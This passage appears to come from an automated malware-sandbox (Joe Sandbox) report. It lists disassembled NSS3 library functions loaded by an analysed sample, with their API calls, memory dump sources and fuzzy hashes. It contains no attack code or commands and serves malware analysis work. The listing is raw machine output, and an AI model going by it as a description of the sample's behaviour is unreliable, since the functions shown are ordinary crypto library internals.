                                                                                                                                                                                                                            • TlsGetValue.KERNEL32(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D11
                                                                                                                                                                                                                            • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D2A
                                                                                                                                                                                                                            • PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D4A
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D57
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4D97
                                                                                                                                                                                                                            • PR_Lock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4DBA
                                                                                                                                                                                                                            • PR_WaitCondVar.NSS3 ref: 6CAE4DD4
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4DE6
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4DEF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3388019835-0
                                                                                                                                                                                                                            • Opcode ID: b90a7b950010c28cab4e0c41de9156fba105afa6f728b92304e932d5d8ed8b14
                                                                                                                                                                                                                            • Instruction ID: b3d0c6dc6fdf271d8bfc82a82e6dea86ae94a7e8b0fcc02a223e7be7e7f09985
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b90a7b950010c28cab4e0c41de9156fba105afa6f728b92304e932d5d8ed8b14
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 59417BB1A14B55CFCB00AFBDD488569BBB8FF49318F058669D8889B700E730E994CBD1
                                                                                                                                                                                                                            Function 6CC77CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CC77CE0
                                                                                                                                                                                                                              • Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC77D36
                                                                                                                                                                                                                            • PR_Realloc.NSS3(?,00000080), ref: 6CC77D6D
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CC77D8B
                                                                                                                                                                                                                            • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CC77DC2
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC77DD8
                                                                                                                                                                                                                            • malloc.MOZGLUE(00000080), ref: 6CC77DF8
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CC77E06
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                            • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                            • API String ID: 530461531-3274975309
                                                                                                                                                                                                                            • Opcode ID: e07309a329db89ccdce0ab0d182aebfc8d90509b5266a4f173f7e5ad573fd7ba
                                                                                                                                                                                                                            • Instruction ID: 37abfa812ad39927b0858837b032b92ba459bf4513c74e27940ee7e55a93bac2
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e07309a329db89ccdce0ab0d182aebfc8d90509b5266a4f173f7e5ad573fd7ba
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2541F9B1A002059FDB14CF29CD8096B3BBAFF94318B25456CE8198BB51F731E851DBB1
                                                                                                                                                                                                                            Function 6CBAECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CBADE64), ref: 6CBAED0C
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBAED22
                                                                                                                                                                                                                              • Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095
                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6CBAED4A
                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6CBAED6B
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBAED38
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CBAED52
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBAED83
                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6CBAED95
                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6CBAED9D
                                                                                                                                                                                                                              • Part of subcall function 6CBC64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CBC127C,00000000,00000000,00000000), ref: 6CBC650E
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                            • String ID: security
                                                                                                                                                                                                                            • API String ID: 3323615905-3315324353
                                                                                                                                                                                                                            • Opcode ID: 8273e2b247f1af66595eec4169a686d323862e36f709d57657cecb6b5d095b5e
                                                                                                                                                                                                                            • Instruction ID: 3789ca17a4add32f0c1777f7d9607f3cc88e077a4b7c26a18c959066ffbc1f3c
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8273e2b247f1af66595eec4169a686d323862e36f709d57657cecb6b5d095b5e
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6A116A76A042E46BE61057A5AC44FBF7278EF4160CF040424E8D173E40FB24A66ED6EB
                                                                                                                                                                                                                            Function 6CB92CD0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 73COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_InitToken), ref: 6CB92CEC
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CB92D07
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_Now.NSS3 ref: 6CC70A22
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC70A35
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC70A66
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_GetCurrentThread.NSS3 ref: 6CC70A70
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC70A9D
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC70AC8
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_vsmprintf.NSS3(?,?), ref: 6CC70AE8
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70B19
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70B48
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70C76
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_LogFlush.NSS3 ref: 6CC70C7E
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB92D22
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70B88
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC70C5D
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CC70C8D
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70C9C
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70CD1
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC70CEC
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70CFB
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70D16
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CC70D26
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70D35
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CC70D65
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CC70D70
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70D90
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: free.MOZGLUE(00000000), ref: 6CC70D99
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB92D3B
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC70BAB
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70BBA
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70D7E
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CB92D54
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC70BCB
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70BDE
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70C16
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                                                            • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                                                                            • API String ID: 420000887-1567254798
                                                                                                                                                                                                                            • Opcode ID: 0dea8b9b59d815d454903ba225370fcbf36823c242388f61a9e81b83e012ea99
                                                                                                                                                                                                                            • Instruction ID: 76621bad107a16e849e8c576bfc47e0850f7f0bf451c9056b86962d56f1eccb7
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0dea8b9b59d815d454903ba225370fcbf36823c242388f61a9e81b83e012ea99
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3221F575601194AFDB009F54DD9CE8A3BB1EF4331EF458021E508D3632EB318E59CB62
                                                                                                                                                                                                                            Function 6CBD4DB0 Relevance: 16.9, APIs: 11, Instructions: 395memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6CBD4DCB
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CBD4DE1
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CBD4DFF
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBD4E59
                                                                                                                                                                                                                              • Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC9300C,00000000), ref: 6CBD4EB8
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CBD4EFF
                                                                                                                                                                                                                            • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CBD4F56
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBD521A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1025791883-0
                                                                                                                                                                                                                            • Opcode ID: 310176b160404682658e341348e87bed0481b36a5c5ef4f6de62bb524ed4a84c
                                                                                                                                                                                                                            • Instruction ID: f497741635c64d7a72f698e010ad7c41840c66c7fc1783a905174f00b3064fcb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 310176b160404682658e341348e87bed0481b36a5c5ef4f6de62bb524ed4a84c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2F1ACB1E00249CBDB08CF54D8407AEB7B2FF44358F268169E915AB780E735E985CF92
                                                                                                                                                                                                                            Function 6CBD0C60 Relevance: 16.7, APIs: 11, Instructions: 153memoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(6CBD2C2A), ref: 6CBD0C81
                                                                                                                                                                                                                              • Part of subcall function 6CBBBE30: SECOID_FindOID_Util.NSS3(6CB7311B,00000000,?,6CB7311B,?), ref: 6CBBBE44
                                                                                                                                                                                                                              • Part of subcall function 6CBA8500: SECOID_GetAlgorithmTag_Util.NSS3(6CBA95DC,00000000,00000000,00000000,?,6CBA95DC,00000000,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA8517
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBD0CC4
                                                                                                                                                                                                                              • Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7
                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBD0CD5
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CBD0D1D
                                                                                                                                                                                                                            • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CBD0D3B
                                                                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CBD0D7D
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBD0DB5
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBD0DC1
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBD0DF7
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBD0E05
                                                                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBD0E0F
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA95E0
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA95F5
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CBA9609
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBA961D
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: PK11_GetInternalSlot.NSS3 ref: 6CBA970B
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CBA9756
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: PK11_GetIVLength.NSS3(?), ref: 6CBA9767
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CBA977E
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBA978E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3136566230-0
                                                                                                                                                                                                                            • Opcode ID: 79511a9c774a8e4d6602d988a106f4b07569cba8ef06524c672d06ea18b4326b
                                                                                                                                                                                                                            • Instruction ID: 7c22cefc2936448635e8412e24bd6129497f5757b7dc0685ae05b73d6adfb4e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79511a9c774a8e4d6602d988a106f4b07569cba8ef06524c672d06ea18b4326b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 134101B5900295ABEB009F64EC81BAF7674EF45308F010029ED1967742EB31BA18CBE2
                                                                                                                                                                                                                            Function 6CB7FCA0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 99stringmemoryCOMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CB7FCBD
                                                                                                                                                                                                                            • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CB7FCCC
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CB7FCEF
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB7FD32
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CB7FD46
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000001), ref: 6CB7FD51
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CB7FD6D
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB7FD84
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmpDownload File
